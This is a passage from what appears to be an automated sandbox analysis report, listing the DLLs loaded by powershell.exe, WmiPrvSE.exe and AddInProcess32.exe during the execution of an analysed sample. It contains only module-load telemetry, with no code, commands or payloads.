                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
